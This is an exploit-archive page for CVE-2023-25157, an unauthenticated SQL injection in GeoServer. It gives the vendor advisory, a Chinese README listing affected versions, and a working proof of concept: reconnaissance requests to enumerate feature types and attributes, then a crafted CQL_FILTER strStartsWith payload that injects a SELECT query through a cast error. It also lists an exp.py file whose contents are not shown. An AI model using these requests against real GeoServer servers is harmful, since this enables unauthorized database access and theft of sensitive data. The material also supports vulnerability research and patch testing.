Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-25157 PoC — Unfiltered SQL Injection Vulnerabilities in Geoserver

Source
https://github.com/charis3306/CVE-2023-25157
Associated Vulnerability
Title:Unfiltered SQL Injection Vulnerabilities in Geoserver (CVE-2023-25157)
Description:GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.
Description
CVE-2023-25157 exp
Readme
## 漏洞描述
由于未对用户输入进行过滤,远程未授权攻击者可以构造畸形的过滤语法,绕过GeoServer的词法解析从而造成SQL注入,获取服务器中的敏感信息,甚至可能获取数据库服务器权限。

## 影响版本
GeoServer 2.20.x < 2.20.7

GeoServer 2.19.x < 2.19.7

GeoServer 2.18.x < 2.18.7

GeoServer 2.21.x < 2.21.4

GeoServer 2.22.x < 2.22.2

## POC
#### 获取可用的功能名称
搜索

```yaml
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities
```

![](https://cdn.nlark.com/yuque/0/2025/png/2623554/1745478538674-9e9658be-daed-46ec-8592-b58745cab09f.png)

#### 获取相关可用功能的可用属性
`vulhub:example `功能名称获取相关的属性

```plain
/geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example
```

![](https://cdn.nlark.com/yuque/0/2025/png/2623554/1745480831082-8508e1b5-aff1-4590-8a26-bdff11154967.png)





```plain
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true
```

![](https://cdn.nlark.com/yuque/0/2025/png/2623554/1745483611728-98f0193a-8d04-4519-977e-bc7f947f4533.png)



![](https://cdn.nlark.com/yuque/0/2025/png/2623554/1745460301680-931c8787-e482-4065-933e-af838e7b3dfd.png)

![](https://cdn.nlark.com/yuque/0/2025/png/2623554/1745460322784-6e119577-78cf-4fc4-921a-bab67a970253.png)


![](https://cdn.nlark.com/yuque/0/2025/png/2623554/1745486139109-e1f1ae0c-2956-4167-80f7-ff01920e1b3b.png)
File Snapshot

 [4.0K]  /data/pocs/460c830a759b99e4a016a856c4ed3261c6a24990
├── [4.6K]  exp.py
└── [1.6K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →